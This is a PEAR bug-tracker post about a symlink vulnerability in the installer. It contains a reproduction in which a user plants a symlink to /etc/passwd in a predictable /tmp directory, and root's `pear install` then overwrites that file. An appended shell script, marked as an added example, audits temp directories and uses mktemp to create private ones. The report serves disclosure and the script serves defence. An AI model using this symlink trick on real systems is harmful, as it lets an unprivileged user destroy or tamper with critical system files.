From:  pear-qa@lists.php.net ("math.parent@gmail.com")
Date:  20 Oct 2015 12:14:11 Hong Kong Time
Newsgroup:  news.php.net/php.pear.bugs
Subject:  [PEAR-BUG] Bug #18055 [Com]: [SECURITY]: Symlink attack

Edit report at https://pear.php.net/bugs/bug.php?id=18055&edit=1

 ID:               18055
 Comment by:       math.parent@gmail.com
 Reported By:      ondrej at sury dot org
 Summary:          [SECURITY]: Symlink attack
 Status:           Duplicate
 Type:             Bug
 Package:          PEAR
 Operating System: Linux
 Package Version:  1.9.1
 PHP Version:      5.3.3
 Roadmap Versions: 
 New Comment:

Hello,

This bug is marked as duplicate. But duplicate of what?


Previous Comments:
------------------------------------------------------------------------

[2010-11-15 23:41:09] dufuz

-Status: Open
+Status: Duplicate


------------------------------------------------------------------------

[2010-11-14 15:24:37] ondrej

Description:
------------
There's a symlink vulnerability when doing PEAR install. PEAR 
should really be using $(mktemp) for its directories like 
download_dir, cache_dir and tmp_dir, and check whether the 
directory doesn't exist.

Test script:
---------------
# pear config-show  | grep /tmp
PEAR Installer cache directory cache_dir        /tmp/pear/cache
PEAR Installer download        download_dir     /tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory  temp_dir         /tmp/pear/temp

# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17 /tmp/buildd/php5-5.3.3/pear-build-download

# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout

# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10


# head /etc/passwd


 Net_Socket
 pear.php.net
 Network Socket Interface
 Net_Socket is a class interface to TCP sockets.  It
provides blocking
  and non-blocking operation, with different reading and writing modes
  (byte-wise, block-wise, line-wise and special formats like network
  byte-order ip addresses).
 


Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.

Actual result:
--------------
Overwritten /etc/passwd just by creating the right directories and 
symlinks.

------------------------------------------------------------------------


-- 
Edit this bug report at https://pear.php.net/bugs/bug.php?id=18055&edit=1
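
The checks the report asks for, as an added shell example (not part of the original bug report and not PEAR's own code): audit_dir flags a download, cache or temp directory that is owned by another user, writable by group or others, or already holds symlinks, and make_private_dir creates a fresh directory with mktemp -d instead of a fixed path. The function names and the pear-audit prefix are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a directory before an installer writes into it.

# audit_dir DIR: print one finding per problem; return 1 if any were found.
audit_dir() {
    dir=$1
    bad=0
    if [ -L "$dir" ]; then
        echo "UNSAFE: $dir is itself a symlink"
        return 1
    fi
    if [ ! -d "$dir" ]; then
        echo "UNSAFE: $dir is not a directory"
        return 1
    fi
    # Owned by someone other than the user who will run the installer.
    if [ -z "$(find "$dir" -prune -user "$(id -u)")" ]; then
        echo "UNSAFE: $dir is not owned by uid $(id -u)"
        bad=1
    fi
    # Group- or world-writable: other accounts can plant entries.
    if [ -n "$(find "$dir" -prune \( -perm -020 -o -perm -002 \))" ]; then
        echo "UNSAFE: $dir is writable by group or others"
        bad=1
    fi
    # Pre-planted symlinks anywhere below the directory.
    links=$(find "$dir" -type l)
    if [ -n "$links" ]; then
        echo "UNSAFE: symlinks present under $dir:"
        echo "$links"
        bad=1
    fi
    return $bad
}

# make_private_dir PREFIX: fresh, unpredictable, mode-0700 directory
# (PREFIX is a caller-chosen label, e.g. the hypothetical "pear-audit").
make_private_dir() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/$1.XXXXXXXX") || return 1
    chmod 700 "$d"
    echo "$d"
}

# Usage: sh audit.sh /tmp/pear/cache /tmp/pear/temp
# (paths as printed by `pear config-show`); with no arguments this is a no-op.
for p in "$@"; do audit_dir "$p" || true; done
```

Run it as the same user that will run the installer, since the ownership check compares against the current uid.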